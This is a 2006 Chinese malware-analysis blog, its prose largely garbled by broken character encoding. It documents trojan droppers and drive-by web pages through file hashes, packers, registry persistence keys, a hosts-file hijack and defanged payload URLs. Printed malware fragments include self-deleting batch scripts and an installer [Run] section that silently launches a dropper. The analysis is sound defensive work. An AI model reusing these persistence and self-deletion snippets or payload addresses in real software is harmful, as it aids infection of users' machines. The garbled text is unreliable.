kvirus.bokee.com

wbem\winlogon.exe wbem\smss.exe aspwswind.dll��ʲô

kvirus.bokee.com — Wed,04 Oct 2006 09:08:00 CST

��Ľ��˼��⣬��д��ת��ע��

wbem\winlogon.exe

wbem\smss.exe

aspwswind.dll

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%system32%\wbem\winlogon.exe
c:\windows\system32\wbem\winlogon.exe

�ĵ��С��683,008�ֽ�
��ԣ�Borland Delphi 6.0 - 7.0

CRC32:37A52607
MD5:DC2970E97243A1C25FE9F9139A30122A
�ӿǷ�ʽ��UPX 0.89.6 - 1.02 / 1.05 - 1.24 (Delphi) stub -> Markus & Laszlo
�ļ��汾��Ϣ��
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 1,0,0,0
Product Version            : 1,0,0,0
============================================================
Product Name               :
File Description           : Generic Hosts for WinService
File Version               : 1.0.0.0
Product Version            : 1.0.0.0
Company Name               : Microsoft
Internal Name              :
Legal Copyright            :
Original FileName          :

��;��Flash��

��.mp3.wma.avi.rm.rmvb..asf.mpeg.mpg.wmv.3gp.mp4.flv.exe.rar.zip.iso.msp.msi.swf.pdf.chm.ppt..pdg.aif.svx.snd.mid.voc.mmf.dat

.gz.z.cab.ace.arj.gzip.tar.7-zip.doc.txt.jpg.jif.jpeg.jpe.png.bmp.ico.psd
��û��Ϣ��data�ļ��д��ݼ�¼�ռ��ļ�
dbisam.lck
DownFileList.blb
DownFileList.dat
DownFileList.idx
ShareFileList.dat
ShareFileList.idx
Users.dat
Users.idx
��ܱ��Ϊ��µ��չ��ļ�
.dbk
.ibk
.bbk
.dup
.iup
.bup

��winlogon.exeͨ��UDP6100��218.64.170.2

��ļ�
BoExplorer.rar
kugoo.mp3
msvsxml.dll��ע��
��أ�hxxp://upcfg.j7y.net/upcfg/Newdownurl.txt
aspwswin.dll��ע�� dll��Ϊ��
SysOption.bin
c:\Downloads\ ��DefaultDownDirĿ¼
��а壬��Ӽ��IEURL�ļ��ΪEXE ISO ASF AVI MP3 MPEG MPG MPGA RA RAR RM RMVB TAR WMA WMP WMV ZIP��ص�c:\Downloads\

��%a
path%Ŀ¼ָ��%system32%\download\
umvdmoes32.dll
��log.j7y.net (218.64.170.2)
aspwstate��oobe\data\��Ĺ��ݼ�¼�ļ�

inetsrv\SysOption.bin
wbem\SysOption.bin
AddrConfig.bin

\windows\temp
\winnt\temp
\Program Files\Kugoo\Incoming\ Kugoo�һ��û��

update.txt
temp.dll��ע��
��kbd101ab.dll
DownBoExplorer.rar
BoExplorer.rar
��GUID
VCFIWZDY32
{98ECDBDC-41C0-4124-8615-A0D0FAFAB047}
MFCExs32.DLL
csrss.exe
.bat
temp
@echo off
:loop
del "
if exist " goto loop
copy
del "
del %0
ForceDirectories
wbem\ddes\
inetsrv\Update\

��ע��
\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Auto
Software\Microsoft\MediaPlayer\Player\Extensions\.fy
Permissions
Runtime
Software\Microsoft\MediaPlayer\Player\Extensions\.rmvb
Permissions
Runtime
Software\Microsoft\MediaPlayer\Player\Extensions\.rm
Permissions
Runtime
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}]
@="SysBackHelper Object"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\LocalServer32]
@="C:\\WINDOWS\\system32\\wbem\\winlogon.exe"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\ProgID]
@="VCFIWZDY32.VCFIWZDY"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\TypeLib]
@="{F63B08CD-3645-474F-8872-BA4293251FF9}"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\Version]
@="1.0"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}]
@="IDOVCFZWD"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}\ProxyStubClsid]
@="{00020424-0000-0000-C000-000000000046}"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}\TypeLib]
@="{F63B08CD-3645-474F-8872-BA4293251FF9}"
"Version"="1.0"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}]
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0]
@="TestCom Library"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\0]
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\0\win32]
@="C:\\WINDOWS\\system32\\wbem\\winlogon.exe"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\FLAGS]
@="0"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\HELPDIR]
@="C:\\WINDOWS\\system32\\wbem\\"
[HKEY_CLASSES_ROOT\VCFIWZDY32.VCFIWZDY]
@="SysBackHelper Object"
[HKEY_CLASSES_ROOT\VCFIWZDY32.VCFIWZDY\Clsid]
@="{881F6F06-4620-4070-AD05-BD77D4C56661}"

PS��򲿷�д��Ѹ�ס�IDM��:-)

#####################################

c:\windows\system32\aspwswind.dll
%system32%\aspwswind.dll

�ĵ��С��240,640�ֽ�
��ԣ�Borland Delphi 6.0 - 7.0
CRC32:BEC55536
MD5:1B80757DF4DCBC3D0DD6649C47B24714
�ӿǷ�ʽ��UPX 0.80 - 1.24 DLL -> Markus & Laszlo
�ļ��汾��Ϣ��
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 6,6,3791,1832
Product Version            : 6,6,3791,1832
============================================================
Product Name               : Microsoft(R) Windows(R) Operating System
File Description           : Background Intelligent Transfer Services
File Version               : 6.6.3791.1832
Product Version            : 6.6.3791.1831
Company Name               : Microsoft Corporation
Internal Name              : qmgr32.dll
Legal Copyright            : (C) Microsoft Corporation. All rights reserved.
Original FileName          : qmgr32.dll

��GUID��
VCFIWZDY32.VCFIWZDY
��hxxp://upcfg.j7y.net/upcfg/plugbag.asp?ID=%d (218.64.170.3)
��
wbem\winlogon.exe
wbem\ddes\
drivers\etcdriver\
winnvusmb32.dll
csrss.exe
NFSWZWin32.dll
nvwrssvd32.dll
B0A208AE.dll
AgentInfo
wbem\SysOption.bin
drogeaswin32.msc
��ʣ�
hxxp://www.163.com
��
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\
ZYYd
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\
aspwstate
ZYYd
SYSTEM\ControlSet001\Services\aspwstate\Start
SYSTEM\CurrentControlSet\Services\aspwstate\Type
SYSTEM\CurrentControlSet\Services\aspwstate\ErrorControl
SYSTEM\CurrentControlSet\Services\aspwstate\DisplayName
ASP.NET Work State Service
SYSTEM\CurrentControlSet\Services\aspwstate\ImagePath
%SystemRoot%\System32\svchost.exe -k aspwstate
SYSTEM\CurrentControlSet\Services\aspwstate\Description
aspwstate
SYSTEM\CurrentControlSet\Services\aspwstate\ObjectName
LocalSystem
SYSTEM\CurrentControlSet\Services\aspwstate\Parameters\ServiceDll
aspwswin.dll

.bat
tempnb
@echo off
:loop
net stop aspwstate
del
if exist "
" goto loop
copy
net start aspwstate
del %0
��ɣ�
a.exe
.fy
.fy
FlashPlayer80CX.dll
urlmons32.dll
COMAdEvent.dll
COMBoHEvent.dll
xmlpros.dll
NetWinDDE.dll
FlashPlayer80CX.dll
urlmons32.dll
COMAdEvent.dll
COMBoHEvent.dll
xmlpros.dll
NetWinDDE.dll
��NFSWZWin32.dll
��wbem\smss.exe

��Ǵ�˵�е�c:\windows\system32\wbem\smss.exe��ڱ��˵��֮�У�
��hxxp://upcfg.j7y.net/upcfg/NewUpcfg.asp?ID=%d��ļ��£�(218.64.170.3)

qproecss.exe ineptpui.dll disckopy.exe avifli32.dl

kvirus.bokee.com — Mon,02 Oct 2006 15:22:34 CST

qproecss.exe
�ļ��汾��Ϣ��£�
Version Information
====================
Operating System           :
File Type                  : Unknown
File Sub-Type              : Unknown
File Version               : 0,0,0,0
Product Version            : 0,0,0,0
===========================================================

=
Product Name : Microsoft(R) Windows(R)

Operating System
File Description : Query Process Utility
File Version : 5.1.2600.0 (xpclient.010817-

1148)
Product Version            : 5.1.2600.0
Company Name               : Microsoft Corporation
Internal Name              : qproecss
Legal Copyright            : (C) Microsoft Corporation. All

rights reserved.
Original FileName : qproecss.exe
�ļ��С �� 21,070 Bytes
�ӿǷ�ʽ��NsPacK V3.4-V3.5 -> LiuXingPing *
��ԣ�MASM32 / TASM32
CRC32:F3CF148D
MD5:D08F139F462446B20CF807409A0A4235
BD��Ϊ��Malware.SBdld

��qproecss.exe��

��ļ��£�
Temp\del.bat
��ݣ�-----------
:DeleteFile
del �� /A
if exist �� goto StillExists
del %0
exit
:StillExists
goto DeleteFile
--------------------
\qproecss.exe
\ineptpui.dll
\disckopy.exe
\avifli32.dll
��ע��
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

\run
Alexa="%system32%\qproecss.exe"
Ver="2006.07.20"

�о��˾��̳��DL��

kvirus.bokee.com — Mon,02 Oct 2006 12:53:36 CST

�о��˾��̳��DL��
hxxp://bbs.milchina.com/ (218.92.120.58)
��ҳ�ײ��

frameborder='0'>
hxxp://ujdmk1.chinaw3.com/xx.html (218.30.100.32)
��ԭһ�Σ�
��Adodb.Stream©��ص��haotian.bat
hxxp://ujdmk1.chinaw3.com/tufei.exe
�ӿǷ�ʽ��UPolyX v0.5 [Overlay] *
��ԣ�VB5.0
�ļ��С��5,389 �ֽ�
CRC32��78C808A6
MD5��2D4DC09E85DEA63E53918118B7581316
BD��Ϊ��Trojan.Downloader.VB.VX

��ɣ�
wdfmgr32.exe
software\microsoft\windows\currentversion\run
.log="wdfmgr32.exe"
tpxdwn.dll��DL��

��صĶ��

��¼��CISRT

��CISRT2006043��ľ�� svhost32.exe xydll.dll ��

ԭ��http://www.cisrt.org/bbs/redirect.php?fid=12&tid=360&goto=nextnewset

��ţ�CISRT2006043
��ƣ�Trojan-PSW.Win32.Delf.ns��Kaspersky��
��
��С��27,806 �ֽ�
�ӿǷ�ʽ��Upack
��MD5��46cb679780591eb8f74c87915eb103cc
��SHA1��51d0f3534031451a4171acd64d74d42cd28453ff
��ʱ�䣺2006.09
��ʱ�䣺2006.09
��
��ʽ��ͨ��ҳ��ľ��

��
==========

��ľ��Ӧ��λ��ľ��ʹ�õ��ǡ��±��ͼ�꣬ԭ�ļ��mhh.exe��к��ϵͳĿ¼��%WINDOWS%\Download\svhost32.exe��ͷ��ļ��%System%\xydll.dllע��̡�

��

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xy"="%WINDOWS%\Download\svhost32.exe"

��
==========

1. ��%WINDOWS%\Download\svhost32.exe��

2. ɾ��ļ��
%WINDOWS%\Download\svhost32.exe

3. ɾ��

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xy"="%WINDOWS%\Download\svhost32.exe"

4. ��

5. ɾ��ļ��
%System%\xydll.dll

��ݴ�ѧ-ά��Ѷ-��ĿƼ��ڿ��ݿ�-��վV6.32

kvirus.bokee.com — Thu,28 Sep 2006 11:47:34 CST

��ݴ�ѧ-ά��Ѷ-��ĿƼ��ڿ��ݿ�-��վV6.32

hxxp://202.195.136.17/index.asp

��ҳ��¶��

hxxp://enzosun.googlepages.com/joke.htm (64.233.179.95)��googlepages��

��Exploit.JS.ADODB.Stream.k��أ�

hxxp://enzosun.googlepages.com/Server.exe
�ļ��С��285,310 �ֽ�
�ӿǷ�ʽ��NSPACK3.7˫��
AVP��Ϊ��Backdoor.Win32.Hupigon.gs
��Ǳ��Ϊ��Backdoor.Gpigeon.gen

IE VML��ȫ��MS06-055--KB925486

kvirus.bokee.com — Wed,27 Sep 2006 09:01:17 CST

MS06-055 KB925486

http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx

��С: 251 KB - 784 KB

��ȷ��ڴ��ʸ�� (VML) �ķ�ʽ��һ��ȫ��⣬��߿��ܻ��ô��Σ�� Microsoft Windows �ļ��İ�ȫ��ȡ�Ըü��Ŀ��Ȩ��ͨ��װ�� Microsoft ��³��ֺ��װ��³��󣬿��Ҫ��

��ҵ��ڴ˸��µĸ��Ϣ: http://go.microsoft.com/fwlink/?LinkID=73174

��ǰ��,��ҿ��ϲ��ѽ��

��Ϣ��

Microsoft Security Bulletin MS06-055
Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)
Published: September 26, 2006

Version: 1.0

Summary
Who Should Read this Document: Customers who use Microsoft Windows

Impact of Vulnerability: Remote Code Execution

Maximum Severity Rating: Critical

Recommendation: Customers should apply the update immediately

Security Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.

Caveats: None

Tested Software and Security Update Download Locations:

Affected Software:

• Microsoft Windows XP Service Pack 1 �� Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=383C13DC-51A9-4B12-89E3-871A1A3DE98F

• Microsoft Windows XP Service Pack 2 �� Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=B5F19858-4E86-4FD4-A264-E4823FF6D0A9

• Microsoft Windows XP Professional x64 Edition �� Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=AFD3279C-6171-4F20-A36E-B9B56EE4C7F1

• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 �� Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=AF8F3A58-BA7A-41BF-BB1B-3A9DDFDC3E27

• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems �� Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=271E9C78-1C6A-443E-924D-43FD6D51E643

• Microsoft Windows Server 2003 x64 Edition �� Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=E2CB474F-FC1B-4B7D-A607-02A1528C6743

С��Ϸ-С��&��

kvirus.bokee.com — Fri,22 Sep 2006 08:42:17 CST

��ʿ͡��εĲ��͡��ϵ�С��Ϸ��ҷ��һ��:-)

С��

��

ת�ԣ�http://staoo.bokee.com/viewdiary.13089257.html

http://staoo.bokee.com/viewdiary.13089439.html

��Ц��ĸ�Ц��һ�Ż��51haha.com and top008.com��

kvirus.bokee.com — Thu,21 Sep 2006 23:44:35 CST

��û��£�ȥ��վ�ÿ͡�˽�ĵĲ��͡��һ�¡�hxxp://lgy520qjj.bokee.com/

��ҳ�ϵĸ��˽��Ϣ�� Ǹ��к�!ϣ��Ҷ��Ŷ~~~ hxxp://haha.3322.net

��ȥ��
hxxp://haha.3322.net/        (61.132.102.125)
hxxp://www.51haha.net/club/
hxxp://www.51haha.net        (61.151.249.244)
hxxp://www.51haha.com        (210.51.23.50)

hxxp://www.51haha.com��js��ȽϿ��ɣ�

��£�
document.write('');
��վ�ɣ�
hxxp://www.top008.com/ (219.129.216.201)�㶫ʡï��
hxxp://www.top008.com/index.htm
��Ϊ��
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
��أ�
hxxp://www.top008.com/nnwan.dll
hxxp://www.top008.com/rund1l32.exe
hxxp://www.top008.com/winst.dll
rund1l32.exe
��ֹRAVMON.EXE��KVMONXP.KXP
��
Software\Microsoft\Windows\CurrentVersion\Run
Cnsmins="rund1l32.exe cnsmin.dll -load -cls"
�ѵ��Cnsmin��ʲô��ϵ��
�޸�IE��Start Page��
��ʣ�hxxp://www.top008.com/msan.ini liveupdate 0.9 Ver
��Զ��
��أ�hxxp://www.top008.com/new.exe ��Ŀǰ��֪��ΪɶʧЧ��
tempnew.exe
��֮�⣬nnwan.dll��ض��winst.dll��װ

��Ŀǰ��ıȽ��:-)
��վ��Ǳ�ֲ��

NetworkDNS.exe��CControl.exe��kavsvc.exe

kvirus.bokee.com — Wed,20 Sep 2006 12:58:26 CST

��http://bbs.2dai.com/thread-428562-1-1.html

kavsvc��Ҫ��
net start Service332244
c:\windows\system32\winloger.exe
net stop Service33224
c:\windows\system32\winloger.exe /uninstall /SILENT
c:\windows\system\Internet Explorer.exe
net stop Service332242
c:\windows\system\Internet Explorer.exe /uninstall /SILENT
c:\windows\system\iexplorer.exe
net stop Service332243
c:\windows\system\iexplorer.exe /uninstall /SILENT
c:\windows\system32\der.exe
c:\windows\system32\dlog.txt

NetworkDNS��Ҫ��

��hxxp://www.kdcent.com/download/upgrade.xml (219.148.111.228)
version 13

��أ�hxxp://www.kdcent.com/download/NetworkDNS.exe
��

��أ�hxxp://www.kdcent.com/download/baiduiebar.exe
�ٶ�IE-BAR
�ͷţ�bdgdins.dll��BDSrHook.dll

��أ�hxxp://www.kdcent.com/download/baidusouba.exe
�ٶ��Ѱ�
�ͷţ�BaiduBar.dll��baidubar.dat��imglist.bmp��logo.bmp

��أ�hxxp://www.kdcent.com/download/SVGHOST.EXE
��ʣ�hxxp://gg.renren.com/cpio/ui.phtml?uid=103554&size=30&type=client&mata=0&bgcolor=ffffff

(211.100.32.195)
��

��ʣ�hxxp://blog.kubao.com/NewArticleList.htm (211.154.163.99)

��أ�hxxp://update.llomo.com/scontrol/CControl.exe
��ʣ�hxxp://update.llomo.com/scontrol/update.xml (218.107.54.9)
8
��ʣ�hxxp://www.coopub.com/scontrol/update.xml (218.107.54.9)
8
��أ�hxxp://update.llomo.com/scontrol/CControl.exe
��أ�hxxp://www.coopub.com/scontrol/CControl.exe
�ⶼ��
host.exe

��ʣ�hxxp://www.kdcent.com/jumpkb.aspx    (219.148.111.228)
��ʣ�hxxp://www.5kys.com/DVImgList.aspx   (222.138.97.57)
��ʣ�hxxp://www.musiccent.com             (222.138.97.57)
��ʣ�hxxp://www.kdcent.com/jumpkd.aspx
��ʣ�hxxp://www.kdcent.com/6330293/index.htm (219.148.111.228)

��˰�ȫ��Ľ��--��ֹ��ʶ��ҳ

kvirus.bokee.com — Wed,20 Sep 2006 10:26:08 CST

��̫��ˡ��Ŀǰ��

��Ҫ��Դ��ڷ��ʵ��ҳ�еĶ��DOWN��ģ��

��Խ��Ҫ�ú��һ��ҳ��߲��Լ�:-))

��°�ȫ��ʩ��Ҿ��Ӧ�߱��ģ��

1��ǽ

2��ܲ��úõ��

��ܽ��ͼƬ��Ӱ��ļ��ActiveX�ؼ��java��Scripts��ã�

3��װ��ȡ�ļ��ص��ļ��ؼ��ӣ��Ƚ��ʿ쳵��IDM��Ѹ�׵ȣ�

4��Գ��쳣��ֹ��OR��أ��ֹ��˵ģ��ٴ��

5��ֹ��ϲ鶾��ʱ��Ҫ��--�ڲ��ڴ��ɾ�

6��ģ�Ȼ��̳��

��֮��Ҫ��һ��ȫ��ϰ��:-)

hxxp://59.34.197.195/theopen.exe

kvirus.bokee.com — Fri,15 Sep 2006 13:58:28 CST

theopen.exe
hxxp://59.34.197.195/theopen.exe

��
killme.bat
del theopen.exe
del killme.bat

�޸�hosts��
\system32\drivers\etc\hosts
559.34.197.239       163.com
559.34.197.239       about:blank
559.34.197.239       baidu.com
559.34.197.239       google.com
559.34.197.239       hao123.com
559.34.197.239       qq.com
559.34.197.239       sina.com
559.34.197.239       sina.com.cn
559.34.197.239       sohu.com
559.34.197.239       ttlttt.com
559.34.197.239       www.163.com
559.34.197.239       www.baidu.com
559.34.197.239       www.google.com
559.34.197.239       www.hao123.com
559.34.197.239       www.qq.com
559.34.197.239       www.sina.com
559.34.197.239       www.sina.com.cn
559.34.197.239       www.sohu.com

��ҳ
C:\Program Files\Internet Explorer\IEXPLORE.EXE hxxp://59.34.197.239/theopen.asp
��Ϊ��

Response �� 'ASP 0156 : 80004005'

HTTP ͷ��

/theopen.asp�� 4

�ѽ� HTTP ͷ��ͻ��κζ� HTTP ͷ��޸Ķ��ҳ��֮ǰ��С�

��ʣ�hxxp://59.34.197.239/open.asp?webname=theopenͳ��д�루��д��ķ��ҳ��

��أ�hxxp://59.34.197.195/theopen.exe

��killme.batɾ��Լ�

��ж��ġ��й��ֲļ۸��

kvirus.bokee.com — Fri,15 Sep 2006 13:07:34 CST

�й��ֲļ۸��--��Ѹֲļ۸��Ѷ
hxxp://www.zh818.com=218.66.102.94
�ײ��

scrolling=no>
Ŀ��ǿ��ҳΪhxxp://www.zh818.com

��£�
hxxp://www.zh818.com/0901/css.htm
AVP��Exploit.JS.ADODB.Stream.k

��ǡ�Сɮ�վ� ��Sp2��ҳľ��

��أ�
hxxp://www.zh818.com/0901/ms.exe ASPack
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
c:\ie.exe
��أ�hxxp://www.zh818.com/0901/ie.exe ASPack

AVP��Trojan-Clicker.Win32.VB.oo

ͨ��msxml2.dll��ʣ�
hxxp://www.zh818.com/0901/adiepage.txt
hxxp://www.zh818.com/0901/adlist.txt
hxxp://www.zh818.com/0901/adset.txt
hxxp://www.zh818.com/0901/ieFavorites.txt
hxxp://www.zh818.com/0901/MMResult.asp
��ļ��£�
%WinDir%\Rundll32.exe
%WinDir%\killme.bat
��Ϊ��
@echo off
sleep 100
del ��
del killme.bat
cls
exit

��
Software\Microsoft\Windows\CurrentVersion\Run
%WinDir%\Rundll32.exe
��%WinDir%\killme.bat
��ݷ�ʽ��
%USERPROFILE%\Favorites\[InternetShortcut]
URL=hxxp://www.zh818.com/
ͬʱ��ҳ��
Software\Microsoft\Internet Explorer\Main\
Start Page =hxxp://www.zh818.com/
��ҳ�޸��
Software\Policies\Microsoft\Internet Explorer\Control Panel\
HomePage
��%WinDir%\killme.batɾ��Լ�

��֪��վ�ٷ��ָ�⣬��ô��£�
��ǿ��ҳ��פ��û��ϵͳ�У��Ϊ��
��վ�ĵ��ʺ��Ҳ�ã��ٹٷ��Ҫ��Щ�ɡ�

v20060913��ˣ��

kvirus.bokee.com — Thu,14 Sep 2006 17:45:00 CST

hxxp://qidong.ssdlh.com/qidong.exe
v20060913

tomsb��ŮͼƬ��Ķ��

kvirus.bokee.com — Thu,14 Sep 2006 16:47:56 CST

��ŮͼƬ��Ķ��
hxxp://www.tomsb.com/

hxxp://www.369ip.com/popup.js
hxxp://www.369ip.com/pop.htm
��أ�hxxp://wmsjsf.com/admin.exe
AVP��Worm.Win32.Viking.ad

hxxp://www.i3guo.com.cn/1.htm

hxxp://www.i3guo.com.cn/index.htm
��أ�hxxp://www.i3guo.com.cn/ok.exe

hxxp://kkpic.net/jj3/

frameborder="0">

frameborder="0">

hxxp://kkpic.net/ggg/adc/index.htm
��أ�hxxp://kkpic.net/ggg/qqq/top.gif
hxxp://kkpic.net/ggg/adc/

hxxp://kkpic.net/ggg/adc/wm.htm
��أ�hxxp://kkpic.net/ggg/adc/123.exe
AVP��Trojan-Downloader.Win32.Small.dtk

hxxp://afied.com/afied/ad0468.htm
hxxp://afied.com/d/ads.htm
��أ�hxxp://afied.com/d/ms32.exe
��Ǳ��Trojan.DL.Delf.def
AVP��Trojan-Downloader.Win32.Small.dti

��֮��ȥ��ɫ��վ��BBS��:-)

��ʡ��¿��Ϣ��ֲ��

kvirus.bokee.com — Thu,14 Sep 2006 14:23:03 CST

��ʡ��¿��Ϣ��ֲ��
hxxp://www.sxrsks.cn/

src="hxxp://www.mtxing.com/images/map/2/image.htm" width="0" height="0" frameborder="0">

hxxp://www.mtxing.com/images/map/2/image.htm ĿǰʧЧ

hxxp://www.sxrsks.cn/Info/pic/image.htm

�Բ��,��ʵ�ҳ�治��!

hxxp://www.sxrsks.cn/Info/pic/windows.htm
��أ�hxxp://www.sxrsks.cn/Info/pic/young.gif
�ļ��С��5,474 �ֽ�
AVP��Exploit.VBS.Phel.cy

��ǰ�ģ��ڷ�� Դ��̳��

kvirus.bokee.com — Wed,13 Sep 2006 14:38:38 CST

��û�п��ű��Ȼ��Ч

��ǰ��"�ڷ�� Դ��̳"

��ֵ�ű��hxxp://www.ee44.net/[1]

��ȫ��Trojan-Downloader

59.34.197.239Ϊ�㶫ʡտ�� ADSL

hxxp://59.34.197.239/kw1034.htm
��أ�hxxp://203.171.236.199/kw1034.exe
ASPack 2.12 -> Alexey Solodovnikov [Overlay]
��أ�hxxp://0.82211.net/999/a0001.exe
setup=Bindok.exe
setup=tshz093
setup=kw_rg_lyric_049.exe
setup=bind_40035.exe
setup=SetupCmd.exe
setup=5027.exe
setup=Project1.exe
setup=56.exe

hxxp://59.34.197.239/234567.htm
��أ�hxxp://203.171.236.199/8888.EXE
�й��Ѱ��߰�װ��
ASPack 2.12 -> Alexey Solodovnikov [Overlay]
��أ�hxxp://union.234567.com/down/hwsetup.exe
�й��Ѱ��߰�װ��
NSPack

hxxp://59.34.197.239/searchbar.htm
��أ�hxxp://203.171.236.215/searchbar.exe
Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
��å��һ��

��˵˵a0001.exe

�ͷ��ļ��£�
Bindok.exe          NSPack
tshz093.exe         ASPack 2.12 -> Alexey Solodovnikov
kw_rg_lyric_049.exe Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
bind_40035.exe      Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
SetupCmd.exe        UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
5027.exe
Project1.exe        ASPack 2.12 -> Alexey Solodovnikov
56.exe

��У�

Bindok.exe NSPack
�ͷ�soft1.exe�Խ�ѹΪok91-063.exe NSPack �ͷ�ttt.exe��10063_setup.exe
�ͷ�soft2.exe�Խ�ѹΪok-32.exe NSPack �ͷ�32.exe��10232_setup.exe
�ͷ�soft3.exe�Խ�ѹΪok-33.exe NSPack �ͷ�33.exe��10233_setup.exe
�ͷ�soft4.exe�Խ�ѹΪok-31.exe NSPack �ͷ�31.exe��10231_setup.exe

Project1.exe ASPack 2.12 -> Alexey Solodovnikov
��أ�hxxp://0.82211.net/ebook/qidong.exe ASPack 2.12 -> Alexey Solodovnikov
��أ�hxxp://0.82211.net/ebook/ebooktmp.exe�Խ�ѹ��
�ͷţ�eebooktmp.exe��Wing.exe
eebooktmp.exe NAPack �ͷţ�RUNIE.exe��10234_setup.exe��10231_setup.exe
��ʣ�hxxp://tj.82211.net/tj/ebook.htm
Wing.exe ASPack 2.12 -> Alexey Solodovnikov
��ʣ�
hxxp://vod.1234o.com/vip4.htm
hxxp://vod.1234o.com/vip3.htm
hxxp://vod.1234o.com/vip2.htm
hxxp://vod.1234o.com/vip1.htm
hxxp://tj.82211.net/tj/wingg.htm

56.exe�Խ�ѹ��ͷ�101656.exe
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

QQ�ϴ��Ĳ��ܷܷ��

kvirus.bokee.com — Mon,11 Sep 2006 13:21:36 CST

QQ��ϴ��ģ�ܷܷ��

hxxp://www.kdfoam.com/manage/qianqianliao.htmlgo=5��ܾ�¼�󡣴�˵�е��Ů��Ըе��壬��ģ�ҡ��ǵĳ嶯��Ϲ�أ�200�˿�ʼ��600�˴��ǽ��߳��ŶҲ��ٶ��Ұ�```�ѷ��䶥��

�ײ��У�

��أ�hxxp://xgliao.net/other/DNCJ.exe

��ݷ��Ϣ��

kvirus.bokee.com — Mon,11 Sep 2006 08:18:20 CST

��ݷ��Ϣ��Ҷ�
hxxp://www.512888.com/

hxxp://qq123943095.vicp.net/www1/user/3.exe

BD96C556-65A3-11D0-983A-00C04FC29E36

winlogin.exe

Trojan-Dropper.Win32.Delf.zb Unit.exe

kvirus.bokee.com — Tue,05 Sep 2006 13:33:08 CST

��Դ

hxxp://dl.itbulo.com/ShowSoftDown.asp?UrlID=2&SoftID=18337

��װ�ű��å��װ
�ٶ��Ѱ�
��Ʒ��
˽�˴��V3.95PRO
��Ʒ-->�Զ��ms.htm��Ȼ��Ҳ��ͷ��һ��

CODE:

��װ�ű��å��װ��ļ��е�Unit.exe��ͱ��Ϊ��Trojan-Dropper.Win32.Delf.zb

��װ�ű��å��װ
�ٶ��Ѱ�
��Ʒ��
˽�˴��V3.95PRO
��Ʒ-->�Զ��ms.htm��Ȼ��Ҳ��ͷ��һ��

��ļ��е�Unit.exe��ͱ��Ϊ��Trojan-Dropper.Win32.Delf.zb
[Run]
Filename: "{app}\Unit.exe";
Filename: "{app}\baidu.exe"; Description: "��װ �� - �ٶ��Ѱԣ��ǿ��

��ߣ��粻��װ��ȡ��ѡ��";
Filename: "{app}\ACpass.exe"; Description: "{cm:LaunchProgram,Access��ݿ��ƽ��

}";
��Run��Կ��ߣ��ð�װ��ִ�У�Unit.exe��baidu.exe��Զ�Ϊ��å

��

��ע��
SOFTWARE\msadx
SOFTWARE\Classes\CLSID\{5ABC9058-B89D-4DE8-A060-A586EA168798}
SOFTWARE\Classes\CLSID\{5ABC9058-B89D-4DE8-A060-A586EA168798}\InProcServer32

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
{5EED7056-B89D-4DE8-A060-D285EA746799}
{5EED7056-B89D-4DE8-A060-D285EA746798}
{5EED7056-B89D-4DE8-A060-D285EA746797}
{5EED7056-B89D-4DE8-A060-D285EA746796}
{5EED7056-B89D-4DE8-A060-D285EA746795}

[Copy to clipboard]

v20060903.rar��N�࣬�汾��Ҳ�ؿ죬��Ⱦ��Χ��ͦ��

